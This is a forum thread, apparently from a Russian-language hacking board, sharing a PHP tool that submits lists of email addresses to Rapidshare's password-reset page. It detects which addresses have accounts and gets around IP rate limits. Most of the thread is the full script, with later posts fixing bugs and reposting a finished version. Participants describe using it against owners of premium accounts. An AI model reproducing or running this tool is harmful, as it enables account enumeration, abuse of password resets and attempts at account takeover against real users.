Extracting User/Pass from Rapidshare.com

Discussion in 'PHP' started by banned, 6 Feb 2008.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Extracting User/Pass from Rapidshare.com


    PHP:
    <?php

        session_start
    ();

        
    $browserData = array();
        
    $browserData[CURLOPT_USERAGENT]      = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9";
        
    $browserData[CURLOPT_FOLLOWLOCATION] = true;
        
    $browserData[CURLOPT_COOKIESESSION]  = true;
        
    $browserData[CURLOPT_COOKIEFILE]     = "cookie";
        
    $browserData[CURLOPT_COOKIEJAR]      = "cookie";

        function 
    curlInit($link,&$browserData,$ssh false)
        {
            
    $ch curl_init($link);
            
    curl_setopt($chCURLOPT_SSL_VERIFYPEER, !$ssh);
            
    curl_setopt_array ($ch,$browserData);

            return 
    $ch;
        }
        function 
    array2postFields($data)
        {
            
    $data = (array) $data;

            
    $postData "";
            foreach(
    $data as $name => $value)
                
    $postData .= $name "=" $value "&";
            
    $postData substr($postData,0,-1);

            return 
    $postData;
        }

        class 
    rapidshare
        
    {
            function 
    __construct(&$browserData)
            {
                
    $this->browserData = &$browserData;
                
    $this->link "http://rapidshare.com/cgi-bin/forgotpw.cgi";
            }

            function 
    requestpassword($username)
            {
                
    $ch curlInit($this->link,$this->browserData,false);

                
    $data = array("email"=>$username);

                
    curl_setopt($chCURLOPT_POSTtrue);
                
    curl_setopt($chCURLOPT_POSTFIELDS,array2postFields($data));
                
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
                
    $responseText curl_exec($ch);
                
    curl_close($ch);


                return 
    $responseText;


            }

            function 
    translateResponse($responseText)
            {
                
    $responseRegexs = array(
                                            
    "noaccounts" => "No accounts found. Please try again",
                                            
    "valid"      => "accounts and sent the data to your e-mail address",
                                            
    "invalid"    => "E-Mail address invalid!",
                                            
    "ipblocked"  => "Too many password requests from your IP-Address! Please try again in one hour"
                                        
    );
                foreach(
    $responseRegexs as $name => $value)
                    if (
    preg_match('%' $value '%'$responseText))
                        return 
    $name;
                return 
    false;
            }
            function 
    testUser(&$user)
            {
                
    $responseText $this->requestpassword($user["username"]);

                
    $response $this->translateResponse($responseText);

                if(
    $response == "ipblocked" || !$response)
                {
                    echo 
    "<div style='margin-bottom:2%;'>IP BLOCKED. Next try in <span id='clock'></span> seconds. Leave the window opened for autorefresh, or change your ip</div>";
                    
    $waitingTime 3610;
                    
    $clockScript=
    <<<CLOCK
            <script>
            waitingTime = 
    $waitingTime;
            function showClock()
            {
                clockHolder = document.getElementById("clock");
                clockHolder.innerHTML = waitingTime--;
            }
            showClock();
            window.setInterval(showClock,1000);

            </script>
    CLOCK;
                    echo 
    $clockScript;

                    echo 
    "<META HTTP-EQUIV='Refresh' CONTENT='{$waitingTime};URL='>";
                    return 
    false;
                }
                else
                {
                    
    $user["response"] = $response;
                    return 
    true;
                }

            }
        }
    ?>

    <body style="background-color:black;color:white">
    <?php

        
    if(isset($_GET["reset"]))
            
    $_SESSION = array();

        
    $users   = &$_SESSION["users"];
        
    $info    = &$_SESSION["info"];

        if(!isset(
    $users))
        {
            if(!empty(
    $_POST["users"]))
            {
                    function 
    validUsername(&$username)
                    {
                        
    $username strtolower($username);
                        return 
    preg_match('/\A[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}\Z/',$username);
                    }
                    
    $users = array();
                    
    $lines explode("\n",$_POST["users"]);
                    foreach(
    $lines as $line)
                    {
                        if (
    get_magic_quotes_gpc())
                            
    $line stripslashes($line);

                        
    $username trim($line);

                        if(
    validUsername($username))
                        {
                            
    $users[] = array(
                                                
    "username" => $username,
                                                
    "response" => false
                                             
    );
                        }
                    }

                    
    $info["nUsers"]      = count($users);
                    
    $info["currentUser"] = 0;

                    if(!
    $info["nUsers"])
                    {
                        
    $_POST = array();
                        
    $_SESSION = array();
                    }
            }

            if(empty(
    $_POST["users"]))
            {
                
    ?>
                <div>Give me some list of emails</div>
                <div>You can freely refresh the window</div>
                <form action="?" method="POST">
                <textarea cols="50" rows="25" name="users" onclick="this.innerHTML='',this.onclick=''">[email protected]
    [email protected]</textarea><br>
                <input type="submit" value="submit">
                </form>
                <?php
            
    }
        }

        if(isset(
    $users))
        {
            
    $rapidshare = new rapidshare($browserData);

            
    $exec $_GET["exec"];

            if(isset(
    $exec))
            {
                for(
    $n $info["currentUser"] ; $n $info["nUsers"]; $n++)
                {
                    if (
    $rapidshare->testUser($users[$n]))
                        
    $info["currentUser"]++;
                    else
                    {
                        break;
                    }
                }
            }

            echo 
    "Tested: " $info["currentUser"] . " users<br><br>";

            for(
    $n $n $info["currentUser"]; $n++)
            {
                
    $user $users[$n];
                
    printf("Username: %s - ",$user["username"]);

                switch(
    $user["response"])
                {
                    case 
    "invalid":
                    {
                        echo 
    "doesn't work. invalid";
                        break;
                    }
                    case 
    "noaccounts":
                    {
                        echo 
    "doesn't work";
                        break;
                    }
                    case 
    "valid":
                    {
                        echo 
    "<b>just WORKS!</b>";
                        break;
                    }
                    default:
                    {
                        echo 
    ".unable to test. Contact the author";
                    }
                }
                echo 
    "<br>";
            }
            echo 
    "<div><a href='?exec'>EXEC</a></div>";

        }




    ?>
    <div><a href="?reset">RESET</a></div>
    </body>
    © underground.com​
     
    2 people like this.
  2. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    ух ты, такого ещё не было.
     
  3. AnonyHamster

    AnonyHamster New Member

    Joined:
    26 Jan 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Если честно, я в этом полный 0. Этот скрипт заливать на сервер и на него отправлять жертв?
     
  4. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Попробуйте вписать туда мыльники и свое тоже))

    Придет что-то типа как мне:

     
  5. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Не надо мне в пм писать...
    Вставляете список email flресов владельцев премиум акков...
    Test, EXEC
    Just Works -> Complete

    //Мда..мой акк разорвали =\
     
  6. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    ага, не надо было показывать
     
  7. Хозяин

    Хозяин Elder - Старейшина

    Joined:
    15 Mar 2006
    Messages:
    435
    Likes Received:
    404
    Reputations:
    110
    Че-то я не догоняю ... сначала не заводился
    Завел ...
    Список мыл вставляю ... сабмит и:
    Жмем экзек:
     
  8. AnonyHamster

    AnonyHamster New Member

    Joined:
    26 Jan 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Дык как же ты завёл расскажи плз)
    Он твой? Я думал ты спец. в паблик выложил
     
  9. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Кривой PHP... Возможно ты не подключил модуль
     
  10. Хозяин

    Хозяин Elder - Старейшина

    Joined:
    15 Mar 2006
    Messages:
    435
    Likes Received:
    404
    Reputations:
    110
    bul.666, стоит курл, и на локалке и на хосте тыкал
     
  11. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Если бы он стоял, не было бы ошибки...
     
    1 person likes this.
  12. AnonyHamster

    AnonyHamster New Member

    Joined:
    26 Jan 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Так что делать с
     
  13. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    2AciD_FreaK
    В файле php.ini
    Найди строку или если её нет то добавь
    extension=php_curl.dll

    Обрати внимание, чтобы не было точки запятой в начале строки...
    Предварительно проверь наличие саамого модуля
     
  14. Хозяин

    Хозяин Elder - Старейшина

    Joined:
    15 Mar 2006
    Messages:
    435
    Likes Received:
    404
    Reputations:
    110
    AnonyHamster

    PHP:
    <<<CLOCK 
            
    <script
            
    waitingTime $waitingTime
            function 
    showClock() 
            { 
                
    clockHolder document.getElementById("clock"); 
                
    clockHolder.innerHTML waitingTime--; 
            } 
            
    showClock(); 
            
    window.setInterval(showClock,1000); 

            
    </script> 
    CLOCK; 
    Замени на это:

    PHP:
    'CLOCK 
            <script> 
            waitingTime = $waitingTime; 
            function showClock() 
            { 
                clockHolder = document.getElementById("clock"); 
                clockHolder.innerHTML = waitingTime--; 
            } 
            showClock(); 
            window.setInterval(showClock,1000); 

            </script> 
    CLOCK'
    ;
    bul.666, я знаю как комментируются строки в php.ini ))
    Проверил уже и строку и модуль
     
    1 person likes this.
  15. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Тогда замените
    PHP:
    $clockScript=
    <<<CLOCK
            <script>
            waitingTime = 
    $waitingTime;
            function showClock()
            {
                clockHolder = document.getElementById("clock");
                clockHolder.innerHTML = waitingTime--;
            }
            showClock();
            window.setInterval(showClock,1000);

            </script>
    CLOCK;
                    echo 
    $clockScript
    На
    PHP:
    echo "<script>
            waitingTime = 
    $waitingTime;
            function showClock()
            {
                clockHolder = document.getElementById('clock');
                clockHolder.innerHTML = waitingTime--;
            }
            showClock();
            window.setInterval(showClock,1000);

            </script>"
    ;
     
  16. Хозяин

    Хозяин Elder - Старейшина

    Joined:
    15 Mar 2006
    Messages:
    435
    Likes Received:
    404
    Reputations:
    110
    Разобрался с курлом, пашет все.

    еще один момент:

    допишите в начало скрипта:
    PHP:
    set_time_limit (0);
    ini_set('max_execution_time',0);
    А то вылетит это чудо у вас
     
  17. -=[AL!EN]=-

    -=[AL!EN]=- Elder - Старейшина

    Joined:
    29 Aug 2007
    Messages:
    24
    Likes Received:
    15
    Reputations:
    0
    дайте окончательный код скрипта, штоле...
    ++
     
  18. Хозяин

    Хозяин Elder - Старейшина

    Joined:
    15 Mar 2006
    Messages:
    435
    Likes Received:
    404
    Reputations:
    110
    PHP:
    <?php 
    set_time_limit 
    (0);
    ini_set('max_execution_time',0);

        
    session_start(); 

        
    $browserData = array(); 
        
    $browserData[CURLOPT_USERAGENT]      = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"
        
    $browserData[CURLOPT_FOLLOWLOCATION] = true
        
    $browserData[CURLOPT_COOKIESESSION]  = true
        
    $browserData[CURLOPT_COOKIEFILE]     = "cookie"
        
    $browserData[CURLOPT_COOKIEJAR]      = "cookie"

        function 
    curlInit($link,&$browserData,$ssh false
        { 
            
    $ch curl_init($link); 
            
    curl_setopt($chCURLOPT_SSL_VERIFYPEER, !$ssh); 
            
    curl_setopt_array ($ch,$browserData); 

            return 
    $ch
        } 
        function 
    array2postFields($data
        { 
            
    $data = (array) $data

            
    $postData ""
            foreach(
    $data as $name => $value
                
    $postData .= $name "=" $value "&"
            
    $postData substr($postData,0,-1); 

            return 
    $postData
        } 

        class 
    rapidshare 
        

            function 
    __construct(&$browserData
            { 
                
    $this->browserData = &$browserData
                
    $this->link "http://rapidshare.com/cgi-bin/forgotpw.cgi"
            } 

            function 
    requestpassword($username
            { 
                
    $ch curlInit($this->link,$this->browserData,false); 

                
    $data = array("email"=>$username); 

                
    curl_setopt($chCURLOPT_POSTtrue); 
                
    curl_setopt($chCURLOPT_POSTFIELDS,array2postFields($data)); 
                
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue); 
                
    $responseText curl_exec($ch); 
                
    curl_close($ch); 


                return 
    $responseText


            } 

            function 
    translateResponse($responseText
            { 
                
    $responseRegexs = array( 
                                            
    "noaccounts" => "No accounts found. Please try again"
                                            
    "valid"      => "accounts and sent the data to your e-mail address"
                                            
    "invalid"    => "E-Mail address invalid!"
                                            
    "ipblocked"  => "Too many password requests from your IP-Address! Please try again in one hour" 
                                        
    ); 
                foreach(
    $responseRegexs as $name => $value
                    if (
    preg_match('%' $value '%'$responseText)) 
                        return 
    $name
                return 
    false
            } 
            function 
    testUser(&$user
            { 
                
    $responseText $this->requestpassword($user["username"]); 

                
    $response $this->translateResponse($responseText); 

                if(
    $response == "ipblocked" || !$response
                { 
                    echo 
    "<div style='margin-bottom:2%;'>IP BLOCKED. Next try in <span id='clock'></span> seconds. Leave the window opened for autorefresh, or change your ip</div>"
                    
    $waitingTime 3610
     echo 
    "<script> 
            waitingTime = 
    $waitingTime
            function showClock() 
            { 
                clockHolder = document.getElementById('clock'); 
                clockHolder.innerHTML = waitingTime--; 
            } 
            showClock(); 
            window.setInterval(showClock,1000); 

            </script>"


                    echo 
    "<META HTTP-EQUIV='Refresh' CONTENT='{$waitingTime};URL='>"
                    return 
    false
                } 
                else 
                { 
                    
    $user["response"] = $response
                    return 
    true
                } 

            } 
        } 
    ?> 

    <body style="background-color:black;color:white"> 
    <?php 

        
    if(isset($_GET["reset"])) 
            
    $_SESSION = array(); 

        
    $users   = &$_SESSION["users"]; 
        
    $info    = &$_SESSION["info"]; 

        if(!isset(
    $users)) 
        { 
            if(!empty(
    $_POST["users"])) 
            { 
                    function 
    validUsername(&$username
                    { 
                        
    $username strtolower($username); 
                        return 
    preg_match('/\A[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,4}\Z/',$username); 
                    } 
                    
    $users = array(); 
                    
    $lines explode("\n",$_POST["users"]); 
                    foreach(
    $lines as $line
                    { 
                        if (
    get_magic_quotes_gpc()) 
                            
    $line stripslashes($line); 

                        
    $username trim($line); 

                        if(
    validUsername($username)) 
                        { 
                            
    $users[] = array( 
                                                
    "username" => $username
                                                
    "response" => false 
                                             
    ); 
                        } 
                    } 

                    
    $info["nUsers"]      = count($users); 
                    
    $info["currentUser"] = 0

                    if(!
    $info["nUsers"]) 
                    { 
                        
    $_POST = array(); 
                        
    $_SESSION = array(); 
                    } 
            } 

            if(empty(
    $_POST["users"])) 
            { 
                
    ?> 
                <div>Give me some list of emails</div> 
                <div>You can freely refresh the window</div> 
                <form action="?" method="POST"> 
                <textarea cols="50" rows="25" name="users" onclick="this.innerHTML='',this.onclick=''">[email protected] 
    [email protected]</textarea><br> 
                <input type="submit" value="submit"> 
                </form> 
                <?php 
            

        } 

        if(isset(
    $users)) 
        { 
            
    $rapidshare = new rapidshare($browserData); 

            
    $exec $_GET["exec"]; 

            if(isset(
    $exec)) 
            { 
                for(
    $n $info["currentUser"] ; $n $info["nUsers"]; $n++) 
                { 
                    if (
    $rapidshare->testUser($users[$n])) 
                        
    $info["currentUser"]++; 
                    else 
                    { 
                        break; 
                    } 
                } 
            } 

            echo 
    "Tested: " $info["currentUser"] . " users<br><br>"

            for(
    $n $n $info["currentUser"]; $n++) 
            { 
                
    $user $users[$n]; 
                
    printf("Username: %s - ",$user["username"]); 

                switch(
    $user["response"]) 
                { 
                    case 
    "invalid"
                    { 
                        echo 
    "doesn't work. invalid"
                        break; 
                    } 
                    case 
    "noaccounts"
                    { 
                        echo 
    "doesn't work"
                        break; 
                    } 
                    case 
    "valid"
                    { 
                        echo 
    "<b>just WORKS!</b>"
                        break; 
                    } 
                    default: 
                    { 
                        echo 
    ".unable to test. Contact the author"
                    } 
                } 
                echo 
    "<br>"
            } 
            echo 
    "<div><a href='?exec'>EXEC</a></div>"

        } 




    ?> 
    <div><a href="?reset">RESET</a></div> 
    </body>
     
    1 person likes this.